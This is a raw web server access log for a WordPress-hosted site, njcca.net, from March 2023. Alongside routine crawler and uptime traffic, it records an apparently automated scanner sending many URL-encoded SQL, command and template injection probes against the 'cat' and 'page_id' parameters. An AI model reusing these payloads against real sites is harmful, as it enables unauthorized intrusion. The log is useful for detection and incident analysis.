192.0.102.40 - - [04/Mar/2023:01:27:21 -0800] "HEAD /BibleStudy HTTP/1.1" 301 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
192.0.102.40 - - [04/Mar/2023:01:27:21 -0800] "HEAD /BibleStudy/ HTTP/1.1" 200 - "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)" "njcca.net"
10.247.24.80 - - [04/Mar/2023:01:27:25 -0800] "POST /BibleStudy/wp-cron.php?doing_wp_cron=1677922045.7700300216674804687500 HTTP/1.1" 500 2565 "https://njcca.net/BibleStudy/wp-cron.php?doing_wp_cron=1677922045.7700300216674804687500" "WordPress/6.0.3; https://njcca.net/BibleStudy" "njcca.net"
114.119.129.25 - - [04/Mar/2023:01:27:52 -0800] "GET /HolyCross/?page_id=862 HTTP/1.1" 200 36543 "https://njcca.net/HolyCross/?p=1628" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:22 -0800] "GET /HolyCross/?page_id=365 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:23 -0800] "GET /HolyCross/?cat=7 HTTP/1.1" 200 51930 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
10.247.24.81 - - [04/Mar/2023:01:32:26 -0800] "POST /HolyCross/wp-cron.php?doing_wp_cron=1677922346.3296470642089843750000 HTTP/1.1" 200 - "https://njcca.net/HolyCross/wp-cron.php?doing_wp_cron=1677922346.3296470642089843750000" "WordPress/6.1.1; https://njcca.net/HolyCross" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:28 -0800] "GET /index.php HTTP/1.1" 200 51190 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:29 -0800] "GET /index.php HTTP/1.1" 200 51190 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:33 -0800] "GET /HolyCross/?cat=%24%7B939006192%2B838429169%7D HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:33 -0800] "GET /HolyCross/?cat=7 HTTP/1.1" 200 51930 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:32 -0800] "GET /HolyCross/?cat=7 HTTP/1.1" 200 51930 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:33 -0800] "GET /HolyCross/?cat=%2F%2A1%2A%2F%7B%7B961133952%2B982669833%7D%7D HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:33 -0800] "GET /HolyCross/?cat=7%0Aexpr+948521372+%2B+901352927%0A HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:33 -0800] "GET /HolyCross/?cat=%24%7B%40var_dump%28md5%28608700717%29%29%7D%3B HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:33 -0800] "GET /HolyCross/?page_id=365 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:34 -0800] "GET /HolyCross/?page_id=%2F%2A1%2A%2F%7B%7B958489001%2B813957069%7D%7D HTTP/1.1" 200 51800 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:34 -0800] "GET /HolyCross/?page_id=%24%7B%40var_dump%28md5%28374185181%29%29%7D%3B HTTP/1.1" 200 51810 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:34 -0800] "GET /HolyCross/?page_id=%24%7B934407418%2B952309600%7D HTTP/1.1" 200 51640 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:34 -0800] "GET /HolyCross/?page_id=365 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:34 -0800] "GET /HolyCross/?page_id=365%0Aexpr+978151449+%2B+982263772%0A HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:36 -0800] "GET /HolyCross/?cat=7%7Cexpr+812959828+%2B+917433258+ HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:36 -0800] "GET /HolyCross/?cat=7 HTTP/1.1" 200 51930 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:36 -0800] "GET /HolyCross/?cat=7 HTTP/1.1" 200 51930 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:37 -0800] "GET /HolyCross/?page_id=365 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
207.241.236.58 - - [04/Mar/2023:01:32:36 -0800] "GET /HolyCross/?p=6351 HTTP/1.1" 200 27576 "-" "Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot)" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:36 -0800] "GET /HolyCross/?cat=%24%7B859264499%2B960437631%7D HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:38 -0800] "GET /HolyCross/?page_id=%27-var_dump%28md5%28322428153%29%29-%27 HTTP/1.1" 200 51740 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:39 -0800] "GET /HolyCross/?page_id=365 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:37 -0800] "GET /HolyCross/?cat=%27-var_dump%28md5%28689123310%29%29-%27 HTTP/1.1" 200 51700 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:40 -0800] "GET /HolyCross/?page_id=365%7Cexpr+889665360+%2B+858826539+ HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:40 -0800] "GET /HolyCross/?cat=7 HTTP/1.1" 200 51930 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:38 -0800] "GET /HolyCross/?page_id=%24%7B862440598%2B908743811%7D HTTP/1.1" 200 51640 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:39 -0800] "GET /HolyCross/?cat=7%24%28expr+940219567+%2B+973708414%29 HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:41 -0800] "GET /HolyCross/?cat=%24%7B%28995561500%2B900075103%29%3Fc%7D HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:40 -0800] "GET /HolyCross/?cat=7 HTTP/1.1" 200 51930 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:42 -0800] "GET /HolyCross/?page_id=365 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:43 -0800] "GET /HolyCross/?cat=7%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281056743370%29%29%29and%27 HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:43 -0800] "GET /HolyCross/?page_id=365%24%28expr+824097066+%2B+875702426%29 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:40 -0800] "GET /HolyCross/?page_id=365 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:44 -0800] "GET /HolyCross/?cat=7%26set+%2FA+900300429%2B924416451 HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:44 -0800] "GET /HolyCross/?cat=%23set%28%24c%3D998575355%2B875591307%29%24%7Bc%7D%24c HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:44 -0800] "GET /HolyCross/?page_id=%24%7B%28986117759%2B801068248%29%3Fc%7D HTTP/1.1" 200 51740 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:45 -0800] "GET /HolyCross/?cat=7%2F%2A%2A%2Fand%2B0%3D0 HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:46 -0800] "GET /HolyCross/?cat=7%22and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281313494039%29%29%29and%22 HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:46 -0800] "GET /HolyCross/?page_id=365%2F%2A%2A%2Fand%2B2%3D2 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:46 -0800] "GET /HolyCross/?page_id=365%26set+%2FA+876305809%2B873177673 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:46 -0800] "GET /HolyCross/?page_id=365%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281735665084%29%29%29and%27 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:47 -0800] "GET /HolyCross/?cat=expr+826776030+%2B+869528822 HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:47 -0800] "GET /HolyCross/?cat=%3C%25-+834942582%2B815743169+%25%3E HTTP/1.1" 200 51660 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:48 -0800] "GET /HolyCross/?page_id=%23set%28%24c%3D937309255%2B817474862%29%24%7Bc%7D%24c HTTP/1.1" 200 51880 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:48 -0800] "GET /HolyCross/?cat=7%2F%2A%2A%2Fand%2B3%3D6 HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:49 -0800] "GET /HolyCross/?cat=extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281629759802%29%29%29 HTTP/1.1" 200 33029 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:49 -0800] "GET /HolyCross/?page_id=365%2F%2A%2A%2Fand%2B1%3D5 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:49 -0800] "GET /HolyCross/?page_id=expr+927115847+%2B+817112898 HTTP/1.1" 200 51620 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:50 -0800] "GET /HolyCross/?page_id=365%22and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281692411427%29%29%29and%22 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:51 -0800] "GET /HolyCross/?page_id=%3C%25-+887277983%2B842621461+%25%3E HTTP/1.1" 200 51700 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:51 -0800] "GET /HolyCross/?cat=7 HTTP/1.1" 200 51930 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:51 -0800] "GET /HolyCross/?cat=7%27and%28select%271%27from%2F%2A%2A%2Fcast%28md5%281914794503%29as%2F%2A%2A%2Fint%29%29%3E%270 HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:52 -0800] "GET /HolyCross/?page_id=365%27and%27d%27%3D%27d HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:53 -0800] "GET /HolyCross/?page_id=extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281406864157%29%29%29 HTTP/1.1" 200 52030 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:54 -0800] "GET /HolyCross/?cat=7 HTTP/1.1" 200 51930 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:54 -0800] "GET /HolyCross/?cat=7%2F%2A%2A%2Fand%2F%2A%2A%2Fcast%28md5%28%271643444809%27%29as%2F%2A%2A%2Fint%29%3E0 HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:55 -0800] "GET /HolyCross/?page_id=365%27and%27n%27%3D%27k HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:57 -0800] "GET /HolyCross/?page_id=365%27and%28select%271%27from%2F%2A%2A%2Fcast%28md5%281959193899%29as%2F%2A%2A%2Fint%29%29%3E%270 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:57 -0800] "GET /HolyCross/?cat=7 HTTP/1.1" 200 51930 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:32:57 -0800] "GET /HolyCross/?cat=convert%28int%2Csys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%271753607076%27%29%29%29 HTTP/1.1" 200 35013 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:32:58 -0800] "GET /HolyCross/?page_id=365%22and%22h%22%3D%22h HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:33:00 -0800] "GET /HolyCross/?page_id=365%2F%2A%2A%2Fand%2F%2A%2A%2Fcast%28md5%28%271247880706%27%29as%2F%2A%2A%2Fint%29%3E0 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:33:00 -0800] "GET /HolyCross/?cat=%28select%2Afrom%28select%2Bsleep%280%29union%2F%2A%2A%2Fselect%2B1%29a%29 HTTP/1.1" 200 33029 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:33:00 -0800] "GET /HolyCross/?cat=7%27and%2F%2A%2A%2Fconvert%28int%2Csys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%271217835076%27%29%29%29%3E%270 HTTP/1.1" 200 53080 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:33:01 -0800] "GET /HolyCross/?page_id=365%22and%22f%22%3D%22z HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:33:03 -0800] "GET /HolyCross/?page_id=convert%28int%2Csys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%271300697452%27%29%29%29 HTTP/1.1" 200 52240 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:33:03 -0800] "GET /HolyCross/?cat=%28select%2Afrom%28select%2Bsleep%286%29union%2F%2A%2A%2Fselect%2B1%29a%29 HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:33:03 -0800] "GET /HolyCross/?cat=7%E9%8E%88%27%22%5C%28 HTTP/1.1" 200 52140 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:33:04 -0800] "GET /HolyCross/?page_id=365 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
114.119.153.53 - - [04/Mar/2023:01:33:06 -0800] "GET /HolyCross/?page_id=775 HTTP/1.1" 200 32628 "https://njcca.net/HolyCross/?p=1628" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:33:06 -0800] "GET /HolyCross/?cat=7%27and%28select%2Afrom%28select%2Bsleep%280%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27 HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:33:06 -0800] "GET /HolyCross/?page_id=365%27and%2F%2A%2A%2Fconvert%28int%2Csys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%271293830097%27%29%29%29%3E%270 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:33:06 -0800] "GET /HolyCross/?cat=7%27%22%5C%28 HTTP/1.1" 200 52050 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
